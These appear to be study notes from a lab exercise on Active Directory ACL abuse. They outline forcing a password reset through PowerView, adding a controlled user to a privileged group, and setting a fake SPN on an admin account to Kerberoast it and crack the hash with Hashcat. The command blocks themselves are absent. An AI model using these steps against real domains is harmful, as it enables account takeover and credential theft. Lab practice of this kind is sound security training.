🦘Abuse Tactics
Here we are going to have to
Use the
wley
user to change the password for thedamundsen
userAuthenticate as the
damundsen
user and leverageGenericAll
rights to add a user that we control to theHelp Desk Level 1
groupTake advantage of nested group membership in the
Information Technology
group and leverageGenericAll
rights to take control of theadunn
user
So, first, we must authenticate as wley
and force change the password of the user damundsen
. We can start by opening a PowerShell console and authenticating as the wley
user. Otherwise, we could skip this step if we were already running as this user. To do this, we can create a PSCredential object.
Now we can create our password for user damundsen ->
Finally, we'll use the Set-DomainUserPassword PowerView function to change the user's password. We need to use the -Credential
flag with the credential object we created for the wley
user. It's best to always specify the -Verbose
flag to get feedback on the command (We could do this from a Linux attack host using a tool such as pth-net
, which is part of the pth-toolkit.)
Now we can authenticate as the damundsen
user and add ourselves to the Help Desk Level 1
group.
Next, we can use the Add-DomainGroupMember function to add ourselves to the target group.
Let's first check if we are not part of this group already with this command ->
Then add ourself ->
We can check if the command was successfull with the following command ->
At this point, we should be able to leverage our new group membership to take control over the adunn
user. Now, let's say that our client permitted us to change the password of the damundsen
user, but the adunn
user is an admin account that cannot be interrupted. Since we have GenericAll
rights over this account, we can have even more fun and perform a targeted Kerberoasting attack by modifying the account's servicePrincipalName attribute to create a fake SPN that we can then Kerberoast to obtain the TGS ticket and (hopefully) crack the hash offline using Hashcat.
We must be authenticated as a member of the Information Technology
group for this to be successful. Since we added damundsen
to the Help Desk Level 1
group, we inherited rights via nested group membership. We can now use Set-DomainObject to create the fake SPN. We could use the tool targetedKerberoast to perform this same attack from a Linux host, and it will create a temporary SPN, retrieve the hash, and delete the temporary SPN all in one command.
Creating a Fake SPN
If it works we could Kerberoast the user ->
We can go on the academy lesson if we wanted to do cleanup and remediation.
Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.
We can see that the user alreadu exists in this group and just to be sure we can ->
Then we can create a fake SPN and kerberaost the account ->
Then we can take the ticket on our local machine and try to crack it with hashcat ->
Last updated